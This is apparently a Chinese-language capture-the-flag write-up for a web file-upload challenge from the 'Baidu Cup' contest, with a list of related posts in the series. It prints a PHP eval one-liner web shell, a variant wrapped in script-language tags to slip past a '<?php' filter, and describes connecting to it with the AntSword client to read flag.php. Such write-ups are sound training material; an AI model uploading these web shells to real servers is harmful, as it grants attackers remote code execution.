“百度杯”CTF比赛 九月场-Upload

合集 - i春秋-选手训练营(15)

1.ISC2016训练赛-phrackCTF-FindKey2024-03-262.第三届上海市大学生网络安全大赛-crackme2024-03-273.2017年全国大学生信息安全竞赛-填数游戏2024-03-274.“百度杯”CTF比赛 2017 二月场-爆破-12024-03-285.“百度杯”CTF比赛 2017 二月场-爆破-22024-03-286.ISC2016训练赛-phrackCTF-Smali2024-03-28

7.“百度杯”CTF比赛 九月场-Upload2024-03-29

8.“百度杯”CTF比赛 九月场-SQL2024-03-309.《从0到1：CTFer成长之路》题目-SQL注入-22024-04-0210.“百度杯”CTF比赛 九月场-SQLi2024-04-0611.“百度杯”CTF比赛 2017 二月场-爆破-32024-04-1312.2017第二届广东省强网杯线上赛- who are you2024-04-1313.i春秋 第二届春秋欢乐赛-Hello-World2024-04-1714.“百度杯”CTF比赛 十月场-Login2024-04-1815.“百度杯”CTF比赛 九月场-1232024-04-18

收起

“百度杯”CTF比赛 九月场

Upload：

类型：web

题目描述：想怎么传就怎么传，就是这么任性。tips:flag在flag.php中

解题方法：打开靶机，获得题目链接是一个文件上传类型的：

看到文件上传，就想到一句话木马，先上传一个一句话木马上去：

<?php @eval ($_POST["1"]);?>

上传成功，我们点击这个上传成功的链接：

这里发现我们的<?php被过滤了，所以我们要用其他的php标记手法：

<script language="PHP">
@eval($_POST["pass"]);//php长标签
</script>

然后现在我们再上传我们的一句话木马

上传成功后再点击上传成功的链接，返回的是一片空白，说明我们的一句话木马上传成功了

现在用中国蚁剑来连：

连接成功！

在目录下找到flag.php